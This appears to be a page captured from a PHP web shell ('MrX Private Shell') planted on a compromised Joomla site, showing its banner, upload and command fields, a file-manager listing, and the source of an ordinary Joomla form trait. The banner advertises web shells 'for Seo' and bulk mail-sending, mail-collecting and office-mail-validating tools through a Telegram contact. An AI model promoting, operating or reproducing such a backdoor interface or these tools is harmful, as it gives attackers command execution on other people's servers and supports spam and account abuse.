__  __    __   __  _____      _            _          _____ _          _ _ 
 |  \/  |   \ \ / / |  __ \    (_)          | |        / ____| |        | | |
 | \  / |_ __\ V /  | |__) | __ ___   ____ _| |_ ___  | (___ | |__   ___| | |
 | |\/| | '__|> <   |  ___/ '__| \ \ / / _` | __/ _ \  \___ \| '_ \ / _ \ | |
 | |  | | |_ / . \  | |   | |  | |\ V / (_| | ||  __/  ____) | | | |  __/ | |
 |_|  |_|_(_)_/ \_\ |_|   |_|  |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1
 if you need WebShell for Seo everyday contact me on Telegram
 Telegram Address : @jackleet
        
        
For_More_Tools: Telegram: @jackleet | Bulk Smtp support mail sender | Business Mail Collector | Mail Bouncer All Mail | Bulk Office Mail Validator | Html Letter private



Upload:

Command:

[email protected]: ~ $
<?php

/**
 * Joomla! Content Management System
 *
 * @copyright  (C) 2018 Open Source Matters, Inc. <https://www.joomla.org>
 * @license    GNU General Public License version 2 or later; see LICENSE.txt
 */

namespace Joomla\CMS\Form;

// phpcs:disable PSR1.Files.SideEffects
\defined('_JEXEC') or die;
// phpcs:enable PSR1.Files.SideEffects

/**
 * Defines the trait for a FormFactoryInterface Aware Class.
 *
 * @since  4.0.0
 */
trait FormFactoryAwareTrait
{
    /**
     * FormFactoryInterface
     *
     * @var    FormFactoryInterface
     * @since  4.0.0
     */
    private $formFactory;

    /**
     * Get the FormFactoryInterface.
     *
     * @return  FormFactoryInterface
     *
     * @since   4.0.0
     * @throws  \UnexpectedValueException May be thrown if the FormFactory has not been set.
     */
    public function getFormFactory(): FormFactoryInterface
    {
        if ($this->formFactory) {
            return $this->formFactory;
        }

        throw new \UnexpectedValueException('FormFactory not set in ' . __CLASS__);
    }

    /**
     * Set the form factory to use.
     *
     * @param   ?FormFactoryInterface  $formFactory  The form factory to use.
     *
     * @return  $this
     *
     * @since   4.0.0
     */
    public function setFormFactory(?FormFactoryInterface $formFactory = null)
    {
        $this->formFactory = $formFactory;

        return $this;
    }
}

Filemanager

Name Type Size Permission Actions
Field Folder 0775
Filter Folder 0775
Rule Folder 0775
Form.php File 67.32 KB 0664
FormFactory.php File 982 B 0664
FormFactoryAwareInterface.php File 787 B 0664
FormFactoryAwareTrait.php File 1.38 KB 0664
FormFactoryInterface.php File 782 B 0664
FormField.php File 40.87 KB 0664
FormFilterInterface.php File 1.49 KB 0664
FormHelper.php File 16.26 KB 0664
FormRule.php File 3.22 KB 0664
Filemanager